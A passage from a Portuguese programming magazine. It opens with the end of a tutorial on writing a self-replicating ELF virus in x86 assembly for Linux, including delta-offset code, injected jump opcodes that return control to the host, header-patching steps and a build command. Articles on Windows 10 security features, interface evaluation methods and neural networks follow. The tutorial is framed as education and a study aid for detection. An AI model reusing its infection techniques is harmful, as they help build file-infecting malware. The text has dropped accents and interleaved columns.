da Dark Angel apresenta, no incio dos anos 90, no seu tutorial
de vrus DOS:
call delta_offset
delta_offset:
pop ebp
sub ebp, delta_offset
Ao fazer um CALL a uma label na posio atual, o valor
atual no apontador da instruo (endereo absoluto) empur-
rado para a pilha para que um RET saiba para onde te retor-
nar. Fazemos POP para fora da pilha e temos o atual aponta-
dor da instruo. Ao subtrair o endereo absoluto do vrus origi-
nal ao atual, temos agora o delta offset em EBP. O delta offset
ser 0 durante a execuo do vrus original.
de notar que de forma a evitar certos obstculos, fa-
zemos CALLs sem RETs, ou vice versa. Eu no recomendo
Segurana
fazer isto fora deste projeto se for possvel evitar porque apa-
rentemente, errar ao emparelhar uma call/ret resulta numa
penalizao de performance. Mas isto no uma situao
comum.
Agora que temos o nosso delta offset, vamos mudar a
nossa referncia para v_start para a verso delta offset:
mov eax, 4
lea ecx, [ebp + v_start] ; adiciona a
; porcao do auto-replicatico, calculada
; com o offset deltamov edx, v_stop -
v_start ; tamanho do autoreplicativo
int 80h
Notemos que no inclui a call de sada do sistema no
vrus. Isto porque no quero que o vrus saia antes de exe-
cutar o cdigo host. Em vez disso, vou substituir essa parte
com o salto para os bytes originais do host. Uma vez que o
ponto de entrada do host varia de host para host, preciso de
gerar isto dinamicamente e injetar o cdigo op diretamente.
De forma a descobrir o cdigo op, devo primeiro entender as
caractersticas da instruo JMP em si. A JMP ir tentar fa-
zer um jump relativo calculando o offset do destino. Quere-
mos dar-lhe uma localizao absotula. Eu descobri o cdigo
op hexadecimal compilando um pequeno programa que faz
JUMP curto e JMP longe. O cdigo op JMP muda de um E9
para um FF.
mov ebx, 0x08048080
jmp ebx
jmp 0x08048080
Compilando isto, corri xxd e inspecionei os bytes e
descobri como interpretar isto para cdigo op.
edx
mov [edi], byte 0xb8
mov [edi+1], edx
mov [edi+5], word 0xe0ff
Movendo uma palavra double no registo EAX acaba
sendo representado como B8 xx xx xx xx. Saltando (JMP)
para um valor armazenado no registo EAX acaba sendo re-
presentado como FF E0.
Tudo junto, isto d-nos um total de 7 bytes extra para
adicionar ao final do vrus. Isto tambm significa que cada
um dos offsets e famanhos de ficheiro que altermos devem
contar para estes 7 bytes extra.
Assim o meu vrus faz alteraes aos headers no
buffer (no no ficheiro), depois sobreescreve o ficheiro host
com os bytes de buffer modificados at o offset onde est o
cdigo do nosso vrus. Ento insere-se (vstart, vstop-vstart)
depois continua a escrever o restante dos bytes do buffer a
partir de onde iniciou. Depois transfere controlo do programa
de volta para o ficheiro host original.
Uma vez que compile o vrus, quero adicionar manualmente
49
 Segurana

COMO CRIAR UM PROGRAMA AUTO-REPLICATIVO EM ASSEMBLY, PARA GNU/LINUX

o meu criador de vrus aps o 8 byte do vrus. Isto pode no Esta experincia permite compreender um pouco melhor
ser necessrio no meu exemplo porque o meu vrus salta alvos como funcionam os vrus, uma vez que so basicamente
que no tm segmento Data, mas que pode nem sempre ser o programas auto-replicativos, mas com uma carga destinada
caso. Liga o teu editor hexadecimal favorito e adiciona esses a fazer estragos (malware). Tambm se espera que tenha
bytes l dentro! ajudado a compreender como detectar este tipo de progra-
ma, sem recurso a ferramentas anti-virus.
Agora estamos prontos. Vamos compil-lo e test-lo :
nasm -f elf -F dwarf -g virus.asm && ld -m elf_i386 -e
v_start -o virus virus.o Referncias
https://github.com/cranklin/cranky-data-virus
Se tudo correu como deveria o resultado ter sido o
esperado!
Concluso
Ao longo do artigo foram abordados temas to diversos
como:

Extraco de mais informao do header do ELF (32 ou

64 bits, execfutvel, etc)

Alocao do buffer dos ficheiros depois do buffer do

targetfile.

AUTOR
Escrito por Antnio C. Santos

Programar criar um novo mundo escrevendo cdigo, cumprindo os mais elementares desgnios da
vida, aprender, ensinar, criar, partilhar, melhorar e seguir. Formou-se no Instituto Politcnico de Viana
do Castelo. Membro da Comunidade Portugal-a-Programar desde Agosto de 2007, tambm membro da
Sahana Software Foundation, onde Programador Voluntrio desde 2012, actualmente exerce funes
de mentor voluntrio na plataforma MOOC Coursera . Twitter:@apocsantos

50
No Code
Windows 10: Ferramentas de Segurana
MODELOS DE AVALIAO DE INTERFACE
Redes neurais artificiais: o que so? Onde vivem? Do que se alimentam?
No Code
WINDOWS 10: FERRAMENTAS DE SEGURANA

Introduo Device Guard e Credential Guard: Essa tecnologia

de segurana baseada na virtualizao (VBS) tem a capaci-
As ameaas de segurana aos dispositivos, dados e
dade de executar os processos mais sensveis do Windows
informaes so um assunto importante no dia a dia e evolu-
num ambiente seguro e evita alteraes, incluindo quando o
em com frequncia. Por isso, necessrio contar com hard-
ncleo do sistema operativo se encontra comprometido.
ware, software e ferramentas que sirvam como uma barreira
para os riscos que os utilizadores enfrentam em atividades
como navegar na internet, instalar aplicaes ou simples-
mente ligar o computador.
Ameaas como o hacking ou infeo de equipamen-
tos com vrus e malware, acontecem tanto a nvel pessoal
como empresarial e, algumas vezes, podem acontecer simul-
taneamente em ambos os cenrios. Por isso, o primeiro pas-
so para reforar a segurana da nossa informao utilizar
equipamentos com ferramentas atualizadas, como por exem-
plo, PCs com Windows 10.
Ferramentas de Segurana
Para manter a integridade dos mesmos, exis-
tem inmeras inovaes que nos protegem de aes poten-
cialmente perigosas. Vejamos algumas delas:
UEFI Secure Boot: Um componente de hardware
(disponvel tambm no Windows 8.x) que ajuda a manter a
integridade do sistema operativo e do firmware desde o mo-
mento em que o PC ligado at o momento em que desli-
gado.
Windows 10 hardware-based security defenses
Trusted Platform Module: Para proteger as chaves
de criptografia e identidades dos utilizadores, o Windows Sensores biomtricos: So tecnologias que permi-
utiliza um chip TPM para verificar os recursos e manter a tem aos utilizadores usar mltiplos fatores de autenticao
integridade e a segurana oferecida pelo UEFI. Funcio- (MFA) nos seus dispositivos, como a Face, ris ou impresso
na com base no hardware e em conjunto com o sistema ope- digital, por exemplo.
rativo.

Leitor impresso digital

Conditional Access e Device Integrity: A integrida-

52

WINDOWS 10: FERRAMENTAS DE SEGURANA
de e estado de um dispositivo pode ser verificada atravs de
servios combinados da Cloud e do sistema. Por exemplo,
se um dispositivo no seguro, os utilizadores podem ace-
der aos servios via VPN, e-mail ou SharePoint.
Microsoft Passport: A autenticao simples
(passwords tradicionais) j no recomendvel porque trata-
se de um mtodo vulnervel a ataques. Atualmente, neces-
sria uma autenticao com recurso a mltiplos fatores, algo
possvel com o Microsoft Passport, que permite o uso de
vrios dispositivos (Smartphones e PCs) para aceder
a diversos equipamentos ou servios, sem precisar recorrer
a instrumentos mais caros e complexos como tokens e ou
smartcards.
Windows Hello: Recurso disponvel no Windows 10 que
permite a autenticao biomtrica para inicio de sesso, ace-
der a aplicaes ou servios online.
53
No Code
Bitlocker e Windows Information Protection: Se o
dispositivo usado a nvel profissional for roubado, possvel
atravs destas solues proteger os dados da empresa e
evitar fugas de informao, algo que pode ser controlado a
partir de qualquer outro dispositivo. Alm disso, permite que
os utilizadores distingam a informao pessoal da profissio-
nal, para que dados classificados como confidenciais no
fiquem expostos em locais pblicos.
Rights Management Services: Recurso disponvel
no Office 365 em conjunto com o Windows 10 que previne
que os utilizadores obtenham, copiem, imprimam ou enviem
documentos de forma acidental e sem autorizao. Alm
disso, possvel restringir o acesso das pessoas a determi-
nados documentos ou e-mails.SmartScreen: Tecnologia ba-
seada na Cloud, disponvel no Microsoft Edge e no Internet
Explorer, garante a confiabilidade de uma pgina web antes
do acesso do utilizador. Pginas potencialmente perigosas,
como as que iniciam downloads, so bloqueadas para que a
segurana do equipamento no seja comprometida.
SmartScreen: Tecnologia baseada na Cloud, dis-
ponvel no Microsoft Edge e no Internet Explorer, garante a
confiabilidade de uma pgina web antes do acesso do utiliza-
dor. Pginas potencialmente perigosas, como as que iniciam
downloads, so bloqueadas para que a segurana
do equipamento no seja comprometida.
Microsoft Edge Smart Screen
No Code
WINDOWS 10: FERRAMENTAS DE SEGURANA
AppContainer: O isolamento o principal objetivo
de um ambiente de execuo do AppContainer. Ao isolar
uma aplicao de recursos desnecessrios e outras aplica-
es, as oportunidades de manipulao mal-intencionada
so minimizadas. Conceder acesso baseado em privilgios
As ameaas de se-
mnimos impede que aplicaes e utilizadores acedam
a recursos alm das suas permisses. Controlar o acesso
gurana aos dispositi-
aos recursos protege o processo, o dispositivo e a rede.
Windows Defender: Atravs da utilizao de servi-
vos, dados e informa-
os Cloud, Machine Learning e diversos esforos de investi-
gao, o Windows Defender permite ao utilizador lidar com
es so um assunto im-
atividades suspeitas e malware com total confiana. As em-
presas podem proteger os seus ambientes atravs do Win- portante no dia a dia e
dows Defender Advanced Threat Protection.
evoluem com frequn-
cia. Por isso, necess-
rio contar com hardware,
software e ferramentas
que sirvam como uma
barreira para os riscos
que os utilizadores en-
frentam em atividades
como navegar na inter-
Recursos
Poder obter informaes mais detalhadas sobre al-
net, instalar aplicaes
guns destes recursos nos seguintes links:
ou simplesmente ligar o
Mitigate threats by using Windows 10 security features
Device Security computador.
Windows Information Protection
Microsoft Passport
Windows Hello for Business Concluso
Rights Management Services Em suma, hardware recente conjugado com funcionalidades
Windows Defender Advanced Threat Protection de segurana disponveis em sistemas operativos como o
Windows 10, so a melhor resposta s ameaas da re-
AppContainer Isolation de, roubo de dispositivos e de identidade ou subtrao de
informaes.

AUTOR
Escrito por Nuno Silva

IT Professional | Windows Insider MVP | Microsoft MVP - Windows Experience (2014-2016) | Microsoft Technical Beta Tester
(Windows International Team) | MCC | Certified Microsoft Windows Phone Expert | Windows Team Division Manager @ Micro-
soft Group Portugal (Facebook)

54

MODELOS DE AVALIAO DE INTERFACE
Um dos pontos mais importantes, apontados no estu-
do das Interfaces Humano-Computador (IHC), a preocupa-
o em desenvolver sistemas voltados ao usurio a partir da
premissa desenvolver sistemas pensando e considerando o
usurio em todo o seu processo (SILVA, 2008, p. 92).
fundamental haver a preocupao do desenvolvimento do
software em atender as especificidades e necessidades do
usurio, a partir da tica usada na Engenharia de Software
(ES) consoante ao estudo da IHC.
Silva (2008, p. 92) cita Nielsen que em seu estudo
classifica os mtodos de avaliao de sistemas em trs cate-
gorias. A saber:
Avaliao Heurs-
Mtodos Analtico tica
ou de Percurso Cogniti-
vo
Inspeo
Checklist
Mtodos empri- Teste de Usabili-
Mtodos
cos dade
para
ou
Avaliao Percurso Plurals-
Teste com Usu-
tico
rios
Modelo GOMS
Outras formas
Questionrios
Os mtodos de avaliao analticos ou de inspeo
so instrumentos usados apenas pelos projetistas e por pro-
fissionais da rea de IHC. Assim sendo, no h a participa-
o do usurio no uso de tais instrumentos.
Os mtodos empricos ou de testes com usurios so
instrumentos que permitem a participao do usurio em
todo o processo de desenvolvimento.
Em relao s outras formas de avaliao, como os
instrumentos citados (Modelo GOMS e Questionrios) ocorre
a participao do usurio, mas no em todo o processo de
desenvolvimento. Nesta categoria h apenas a participao
parcial do usurio.
Avaliao Heurstica
Heurstica pode ser entendida como uma regra ou
diretriz que tem por finalidade guiar uma deciso de projeto
ou mesmo criticar uma deciso j tomada (DIX et al. 2004).
Este mtodo baseado em uma anlise realizada a partir da
interface e sua relao com os princpios de usabilidade do
sistema do ponto de vista do prprio desenvolvimento. um
mtodo analtico considerado rpido e barato por poder ser
aplicado por uma pequena equipe de avaliadores em torno
de cinco integrantes desde o incio do ciclo de desenvolvi-
55
No Code
mento, a partir de um prottipo realizado em papel. Um fato
no uso deste mtodo, que este, no inclui a parte relaciona-
da a proposta de melhorias. No entanto, esta atividade pode
vir a ser realizadas como resultado da discusso entre avalia-
dores, no sentido de buscar o que ser feito para resolver er-
ros ou melhorar a interface.
Nielsen (1994) prope o uso de um conjunto de dez
heursticas como base de verificao para cada um dos avali-
adores da equipe, que deve ser formada entre trs e cinco
componentes. Neste processo cada uma das dez heursticas,
de forma independente, deve ser verificada por todos os ava-
liadores com base nos cenrios tpicos de uso do sistema. Os
itens que estejam fora de escopo devem ser anotados, espe-
cificados e listados e deve a eles ser atribudo grau de severi-
dade de 0 a 4, sendo este significado:
0. menor severidade, o problema no considerado
como um problema de usabilidade;
1. problema de nvel cosmtico que ser resolvido se
houver disponibilidade de recursos e de tempo;
2. problema de nvel pequeno de usabilidade onde sua
resoluo ter grau de menor prioridade;
3. problema de nvel maior de usabilidade com alto grau
de prioridade para sua soluo;
4. problema de nvel de seriedade alto, o qual requer ser
resolvido antes da continuidade do desenvolvimento
do software.
As dez avaliaes heursticas citadas por Nielsen
(1994) so indicadas a seguir:
1. Visibilidade do status do sistema O sistema deve
informar o usurio por meio de aes de feedbacks
sobre o que est acontecendo;
2. Integrao do sistema com o mundo real O sistema
deve fazer uso de termos, aes e conceitos com os
quais o usurio esteja familiarizado, fornecendo infor-
maes em ordem natural e lgica;
3. Controle e liberdade do usurio O sistema deve ofe-
recer suporte a correo de aes incorretas ou inde-
sejadas (como, por exemplo, um comando desfazer)
praticadas pelo usurio de modo que o usurio tenha
uma maneira de fazer uso de uma sadas de emer-
gncia;
4. Consistncia e padres O sistema deve ter sua in-
terface definida de forma padronizado e consistente;
5. Preveno de erros O sistema deve possuir um n-
vel adequado do controle de excees para neutrali-
zar a ocorrncia de erros, quer seja por eliminao de
situaes propcias ao erro, quer seja pelo uso de
mensagens de advertncia e confirmao;
No Code
MODELOS DE AVALIAO DE INTERFACE
6. Reconhecimento em vez de lembrana O sistema
deve ser intuitivo de maneira que possa minimizar a
necessidade de o usurio memorizar aes, objetos,
comandos e opes, disponibilizando suas funcionali-
dades de forma visvel e clara;
7. Flexibilidade e eficincia de uso O sistema deve ser
desenvolvido com o sentido de satisfazer as necessi-
dades de seus usurios inexperientes e experientes
que necessitam de maior interao com o sistema;
8. Design esttico e minimalista O sistema deve conter
dilogos apenas com detalhes e informaes que
sejam efetivamente relevantes;
9. Ajuda para o usurio reconhecer, diagnosticar e recu-
perar-se dos erros O sistema deve apresentar men-
sagens de erros claras, indicando precisamente o
problema ocorrido e sugerindo solues que sejam
precisas e adequadas;
10. Ajuda e documentao O sistema deve prover infor-
maes que sejam relevantes e possuir documenta-
o que seja concisa, de fcil pesquisa e focadas nas
tarefas do usurio, alm de listar os passos exatos a
serem executados.
Percurso Cognitivo
Mtodo analtico que visa efetuar a simulao passo a
passo do comportamento de certo usurio sob a tica de
certa tarefa, devido a esta caracterstica obriga o avaliador a
conhecer bem quem o usurio, suas caractersticas, habili-
dades e deficincias para conseguir efetuar as aes que
sejam adequadas. um mtodo aplicado no incio do desen-
volvimento.
Prates & Barbosa, (2003, p. 18) apontam que antes
de realizar este mtodo de avaliao preciso passar por
uma fase de preparao, onde devero ser definidos:
hipteses sobre os usurios e sobre o conhecimento
que eles tm sobre a tarefa e sobre a interface pro-
posta;
cenrios de tarefas, construdos a partir de uma sele-
o de tarefas importantes e de tarefas frequentes;
sequncia correta de aes para completar cada
tarefa, tal como definida pelo projetista;
proposta de design em papel ou prottipo, ilustrando
cada passo e indicando o estado da interface antes/
depois de cada um.
Prates & Barbosa, (2003, p. 18) indicam que o processo de
execuo da avaliao compreende as seguintes etapas de
ao:
1. o projetista apresenta uma proposta de design;
2. os avaliadores constroem histrias plausveis sobre a
interao de um usurio tpico com a interface, com
base nos cenrios de tarefas selecionados;
3. os avaliadores simulam a execuo da tarefa, efetuan-
do uma srie de perguntas sobre cada passo;
4. os avaliadores anotam pontos-chave, como:
o que o usurio precisa saber antes de realizar
a tarefa
o que o usurio deve aprender ao realizar a
tarefa
A cada passo, os avaliadores necessitam refletir sobre
uma srie de perguntas, buscando descobrir problemas em
potencial que podem vir a ocorrer durante a interao de
usurios reais com o software efetivamente implementado
conforme proposto em seu projeto (PRATES & BARBOSA,
2003, p. 19).
Checklist
Mtodo analtico que tem por finalidade estabelecer
um critrio de acompanhamento e verificao de cumprimen-
to de itens de certa interface no sentido de mostrar se a inter-
face em foco est em conformidade com os itens previstos
para a interface e se estes contedos e opes esto acess-
veis aos usurios.
O mtodo checklist til, mas tende a crescer e se
tornar incmodo, surgindo a necessidade de uma organiza-
o especfica para seu uso (BUENO & CAMPELO, 2013, p.
6).
Aps coletado a lista de pontos de verificao, ou se-
ja, o checklist este deve ser submetido a validao por um
grupo de profissionais experientes na prtica de projetos e
anlise de sistemas (AGNER, 2007, p. 274).
Teste de Usabilidade
Mtodo usado na fase final do desenvolvimento que
objetiva acompanhar as aes de um usurio sobre a utiliza-
o de certo sistema podendo ser realizado sobre um protti-
po de alta-fidelidade ou sobre o sistema implementado, sen-
do esta caracterstica considerada o principal ponto positivo
desta ferramenta de avaliao. No entanto, para que esta
ferramenta seja bem-sucedida necessrio aos avaliadores
tomarem o cuidado de focarem o que efetivamente deve ser
avaliado para assim prestar ateno nas partes em estudo.
Usabilidade deve ser entendido como sendo um atri-
buto de qualidade de uso relacionado facilidade de manipu-
lao de algo. Isto posto, relaciona-se rapidez com que os
usurios podem aprender e desenvolver as habilidades ne-
cessrias para fazer uso de algo. Se determinado recurso
56

no puder ser utilizado, no h motivo real para que o mes-
mo exista (NIELSEN & LORANGER, 2007). Segundo expe
Barbosa & Silva (2010), a usabilidade o critrio de qualida-
de de uso mais conhecido e frequentemente considerado.
Percurso Pluralstico
Mtodo de avaliao sistemtico que possibilita esta-
belecer critrios sobre sequncias de interfaces, que so os
percursos a partir da interao com vrias pessoas, neste
caso pluralidade, destacando-se os usurios, os projetistas e
os profissionais de IHC. Neste mtodo os usurios a partir da
observao e uso de uma sequencia de telas tecem quais
seriam as aes necessrias para executar certa tarefa a ser
implementada por um projetista ou profissional de IHC. A
partir deste ponto faz-se a troca de informaes entre usu-
rios e projetistas/profissionais de IHC no sentido de se obser-
var se o que foi implementado de fato realizado pelo usu-
rio. Enquanto no ficar equacionado o que deve ser feito com
o que foi implementado da tica do usurio deve-se repensar
as aes. Somente aps todos entenderem como deve ser o
procedimento correto, que o mesmo definido e passa-se
para uma prxima tarefa para nova avaliao.
Hagiwara & Medeiros Filho (2008, p.4) informam que:
Este mtodo aplicado utilizando-se um conjunto de
painis, que por sua vez, so cpias da interface da
tarefa que est sendo avaliada, apresentados na
ordem em que apareceriam caso o software estives-
se sendo executado.
Segundo aponta Chan (1996) o percurso pluralstico
mostra-se til, principalmente na fase inicial do processo de
desenvolvimento do software em anlise.
Modelo GOMS
O mtodo Goals (Objetivos), Operators (Operadores),
Methods (Mtodos) e Selection rules (Regras de seleo)
possui como caracterstica operacional a no participao do
usurio no processo de avaliao, pois visa mensurar o tem-
po de ao e reao do usurio no uso de certo recurso exis-
tente na interface. Este modelo de base cognitiva busca re-
presentar o comportamento dinmico do usurio durante a
sua interao com o computador (PRATES, et. al, 2003, p.
446).
Neste mtodo estipulada uma margem de tempo,
estimada como possvel para que o usurio possa tomar
uma deciso em relao a ao a ser executada (clicar num
boto, encontrar um boto, arrastar o mouse, clicar em um
boto, etc). Para tanto, definido um operador para cada
passo que necessita o usurio realizar para executar certa
ao; para cada operador atribudo um valor, de maneira
57
No Code
MODELOS DE AVALIAO DE INTERFACE
que o tempo utilizado na realizao de cada ao possa ser
calculado por meio da soma dos valores atribudos a cada
operador necessrio para executar a ao. Silva (2008) cita
que os valores a serem usados para a definio dos operado-
res se encontram na literatura produzida por John & Kieras
(1996). Ao final deste mtodo de avaliao o resultado so as
aes e os operadores so o total de tempo para realizar a
tarefa mensurada.
Preece, et. al. (2013), aponta que uma das principais
vantagens deste modelo de avaliao a facilidade com que
as anlises comparativas realizadas sobre o uso de interfa-
ces podem ser feitas sem o prvio treinamento de usurios
ou de sesses de testes. Na contramo desta opinio Card,
et. al. (1983) aborda que o modelo apresenta algumas limita-
es, como: o fato deste modelo ser aplicado para um estudo
voltado a usurios experts; a questo de no considerar as
diferenas individuais entre os usurios e acrescenta que o
modelo no considera o tempo de aprendizagem do usurio
para fazer uso do.
Questionrios
Mtodo de avaliao que tem por objetivo identificar
as preferncias, nvel de satisfao e ansiedade dos usurios
por meio de questionrios. Mariano, et. al. (2011, p. 4) infor-
ma que a tcnica de aplicao de questionrio uma manei-
ra impessoal de obter informaes, dando maior liberdade
para o usurio. Acrescente que o questionrio deve ser pre-
parado com antecedncia, sendo uma ferramenta que permi-
te a avaliao de um grande numero de usurios, com um
baixo custo de aplicao.
Os questionrios podem ser elaborados a partir de
questes: abertas, respostas discursivas; escalares, respos-
tas dadas em escalas; de mltipla escolha, vrias respostas
para cada questo em que o usurio seleciona uma
(MARIANO, et. al., 2011, p. 4).
Bibliografia
AGNER, L. Arquitetura de Informao e Governo Ele-
trnico: Dilogo: Cidades-Estado na World Wide
Web Estudo de Caso e Avaliao Ergonmica de
Usabilidade de Interfaces Humano Computador.
Tese de Doutorado, Orientador: Anamaria de Moraes.
Rio de Janeiro: PUC, 2007. Disponvel em: <http://
www.agner.com
.br/download/tesedoutorado/>. Acesso em: 22 abr.
2013.
BARBOSA, S. D. & SILVA, B. S. Interao Humano-
Computador. Rio de Janeiro: Elsevier, 2010.
BUENO, C. de F. dos S. & CAMPELO, G. B. Qualida-
de de Software. Recife: Universidade Federal de
Pernambuco: Departamento de Informtica, 2013.
Disponvel em: <http://sistemas.riopomba.ifsudes
No Code
MODELOS DE AVALIAO DE INTERFACE
temg.edu.br/dcc/materiais/1022789570_Qualidade%
20de%20Software.pdf>. Acesso em 25 abr. 2013.
CARD, S. K., MORAN, T. P. & NEWELL, A. The
Psychology of Human-Computer Interaction. Lon-
don:Lawrence Erlbaum Associates. 1983.
CHAN, S. da R. H. V. Estudo comparativo de mtodos
para avaliao de interfaces homem-computador.
Relatrio Tcnico IC/ 96-05. Campinas, So Paulo.
26p., 1996.
DIX, A.; FINLAY, J.; ABOWD, G.; & BEALE, R. Hu-
man-Computer-Interaction. USA: Pearson Educati-
on, 2004.
HAGIWARA, R. C. & MEDEIROS FILHO, D. A. Uma
Taxonomia para Processos de Avaliao da Inte-
rao Humano-Computador. Paran: Universidade
Estadual de Maring UEM, 2008.
MARIANO, E.; PONTOLI, J. C. da S.; MARCHI, K. R.
da C. IHC Anlise e Avaliao dos Usurios. Pa-
ranava: UNIPAR - Universidade Paranaense, 2011.
NIELSEN, J. & LORANGER, H. Usabilidade na Web.
AUTOR
Escrito por Augusto Manzano
Natural da Cidade de So Paulo, tem experincia em ensino e desenvolvimento de programao de software desde 1986.
professor da rede federal de ensino no Brasil, no Instituto Federal de Educao, Cincia e Tecnologia. tambm autor, possuin-
do na sua carreira vrias obras publicadas na rea da computao.
58
Rio de Janeiro: Elsevier, 2007.
NIELSEN, J. Heuristic evaluation: Inspection Methods.
New York: John Wiley & Sons, 1994.
PRATES, R. O. & BARBOSA, S. D. J. Avaliao de
Interfaces de Usurio - Conceitos e Mtodos:
Anais do XXIII Congresso Nacional da Sociedade
Brasileira de Computao. XXII Jornadas de Atua-
lizao em Informtica (JAI). SBC, 2003.
PRATES, R. O.; FIGUEIREDO, R. M. V. de; BACH, C.
F. Um Modelo de Apoio ao Projeto de Design de Inter-
faces de Ambientes de Aprendizado. Rio de Janei-
ro: UERJ: Instituto de Matemtica e Estatstica, 2003.
PREECE, J.; ROGERS, Y. & SHARP, H. Design de
Interao. 3a. ed. Porto Alegre: Bookman, 2013.
SILVA, M. A. R. Interface Humano-Computador. Ba-
tatais: Claretiano, 2008.
1
JOHN, B. E.; KIERAS, D. E. The GOMS family of user inter-
face analysis techniques: comparison and contrast. ACM
Transactions on Computer-Human Interaction, v. 8, n. 3,
p. 320-351, 1996.

Redes neurais artificiais: o que so? Onde vivem? Do que se alimentam?
Atualmente, muito se fala em inteligncia artificial. O
Google investe, a Microsoft, a Amazon, a Uber, o Facebook,
a Apple... E essa lista no para por aqui. Ns sabemos que
uma tecnologia pujante, que, juntamente com a correta
anlise do Big Data, certamente ser uma das ferramentas
mais poderosas que ns teremos no futuro prximo.
A ideia deste artigo falar um pouco da inteligncia
artificial, mais precisamente abordar os algoritmos das redes
neurais artificiais (RNA), sua arquitetura, seu funcionamento
e suas principais aplicaes.
Embora muitos tenham a ideia de que redes neurais
so sistemas computacionais que imitam o crebro humano,
na realidade, essa ideia de rede neural no passa de uma
metfora. Essa metfora totalmente plausvel, pois as
redes neurais artificiais tomam por base as redes neurais
biolgicas associadas ao processamento paralelo do crebro
humano.
A rede neural, em suma, uma abordagem
alternativa aos mtodos estatsticos tradicionais utilizados
para solucionar problemas de previso de sries temporais.
Apesar de parecer simples primeira vista, preciso sempre
ter em mente a metfora do crebro humano, pois esse
modelo matemtico se baseia nesse funcionamento.
O neurnio biolgico
Sendo assim, necessrio entender primeiramente
como funciona o neurnio. Voc pensou que aquelas aulas
de biologia seriam inteis n? Simploriamente falando, um
neurnio constitudo por um corpo celular, que possui
algumas ramificaes chamadas de dendritos. O mesmo
corpo celular possui um alongamento chamado axnio, cuja
extremidade chamada de telodendro. A passagem do
impulso nervoso se d na regio da sinapse. Isso mesmo,
aquela que acelerada com uma pequena dose de lcool
(lembre-se, eu disse pequena!). Essa rea composta pelo
encontro dos dendritos de um neurnio com os axnios de
outro. E sempre ocorre no sentido axnio, dendrito.
59
No Code
Voc deve estar se perguntando por que isso
importante. Os neurnios funcionam baseados na lei do tudo
ou nada. Ou seja, se o estmulo excitatrio for muito
pequeno, nenhuma propagao efetuada. Por outro lado,
desde que o limiar seja atingido, independentemente da sua
intensidade, o potencial da ao do neurnio ser o mesmo.
Essa lei foi o primeiro passo para que se desenvolvesse o
primeiro modelo matemtico para o desenvolvimento das
redes neurais artificiais.
Primeiro modelo de neurnio artificial
O primeiro modelo, concebido em 1943 por McCulloch
e Pitis, formado por um vetor de entrada, e as sinapses so
representadas por pesos numricos. Vide frmula abaixo:
Na figura, X1 a Xn representam as variveis de
entrada i do neurnio de sada j. A entrada lquida dada
pela somatria dos pesos sinpticos de i=1 at n, onde o
limiar sinptico.
Posteriormente, muitos outros modelos matemticos
foram desenvolvidos: Perceptron, Adaline (extenso do
Perceptron), Perceptron multicamadas (MLP), Algoritmo
Backpropagation, Redes de Jordan e Elman, Algoritmo
GDMH, Combinacional, Iterativo Multilayer, Multiplicativo-
aditivo, Multilayer com Neurnio Ativo, Multiaplicativo-aditivo
com Neurnio Ativo, Algoritmo Evolucionrio, Rede ART,
Rede Counter-propagation, Rede de Hopfield, Rede de
Kohonen, Rede LVQ.
Apesar do grande nmero de modelos de RNA, aqui
vamos citar apenas o modelo inicial e o Algoritmo
Evolucionrio.
O algoritmo de Darwin
Outro algoritmo muito utilizado para a resoluo dos
problemas atuais o Algoritmo Evolucionrio. Ele baseado
nos princpios da evoluo biolgica de Darwin, no qual o
No Code
REDES NEURAIS ARTIFICIAIS: O QUE SO? ONDE VIVEM? DO QUE SE ALIMENTAM?

mais apto sobrevive. Por conta desse modelo evolucionrio, numrica perante as operaes matemticas. J as camadas
esse algoritmo bastante utilizado na aprendizagem de uma ocultas so constitudas pelos neurnios que so
RNA. Basicamente, ele busca os pesos sinpticos que responsveis pela extrao das caractersticas associadas ao
melhor representam a soluo do problema. sistema a ser inferido. Aqui onde ocorre praticamente todo
o processamento interno da rede. E, por sua vez, as
Esse modelo utiliza muito bem a metfora de Darwin.
camadas finais so constitudas pelos neurnios que so
Oi? O que Darwin tem a ver com inteligncia artificial? responsveis por produzir e apresentar os resultados finais
advindos dos processamentos das camadas anteriores.
Vamos l! uma populao inicial so aplicados
operadores genticos de mutao e cruzamento em cada As camadas e a disposio dos neurnios so
indivduo com o intuito de que eles evoluam e representem basicamente responsveis pelos tipos de arquiteturas de
melhores solues para o problema. RNA encontradas atualmente. Abaixo, segue um modelo de
camadas e quantidade de neurnios.
O algoritmo se inicia com uma populao inicial
gerada aleatoriamente. Nessa populao, avaliada a
aptido sobrevivncia de cada indivduo. Em seguida, a
aptido d a cada indivduo uma pontuao baseada na
pontuao desejada para a resposta almejada. Aqui, o
clculo da aptido de cada indivduo realizado pela funo
do erro mdio quadrtico a seguir.

Ao final do clculo de aptido, formada uma nova Arquiteturas e aplicaes

populao de filhos por meio do processo de seleo e
cruzamento. Nesse ponto, o processo de seleo por torneio
escolhe os filhos que sero pais para gerar o processo de
reproduo. Em seguida, aplicado o operador gentico de
cruzamento, o que permite a troca de material gentico dos
pais, possibilitando assim que os filhos recebam as
caractersticas dos pais. Ento, na nova populao de filhos,
aplicado o operador gentico de mutao, alterando
aleatoriamente o valor de um gene do indivduo que tenha
uma probabilidade mnima de mutao. Ao final de todo esse
processo, a nova populao passa pelo processo de elitismo,
no qual o indivduo menos apto substitudo pelo melhor
indivduo da populao anterior.
Essas arquiteturas so responsveis pela
performance da sua RNA. Ou seja, se voc est querendo
desenvolver um algoritmo de RNA para utilizar na sua
aplicao, precisa pensar em qual arquitetura ser mais til
na resoluo do seu problema. A mesma arquitetura pode ser
excelente para um problema, e nem to boa para outro.
As RNAs so classificadas de acordo com a sua
arquitetura em:
Dinmica;
Fuzzy;

nica camada;

As camadas Mltiplas camadas.

Se voc est acompanhando bem o artigo, percebeu Quando utilizar uma RNA? Para a utilizao de RNAs,
que todo algoritmo de RNA baseado em um modelo voc pode utilizar basicamente o seguinte critrio de
matemtico. E percebeu tambm que esse modelo classificao, lembrando que isso no uma receita de bolo.
matemtico normalmente tem relaes com modelos
biolgicos. Alm disso, percebeu que ele composto, muito
rudemente falando, de somatrias, combinaes, pesos e Reconhecimento de padres e classificao;
camadas. Vamos explicar agora o que so as camadas.
Processamento de imagem e viso;
Quando falamos de RNA, existem trs tipos de
camadas: camada de entrada, intermediria ou oculta e Identificao de sistema e controle;
camada de sada. As camadas intermedirias so as
responsveis por receber os dados advindos do meio Processamento de sinais.
externo. Essas entradas normalmente so normalizadas por
funes de ativao e implicam uma melhor acurcia

60
 No Code
REDES NEURAIS ARTIFICIAIS: O QUE SO? ONDE VIVEM? DO QUE SE ALIMENTAM?

Os itens acima podem ser considerados macrotemas. Karabatak, em 2009, apresentou um sistema de diagnstico
Abaixo, seguem algumas aplicaes especficas: automtico para cncer de mama, utilizando a base de dados
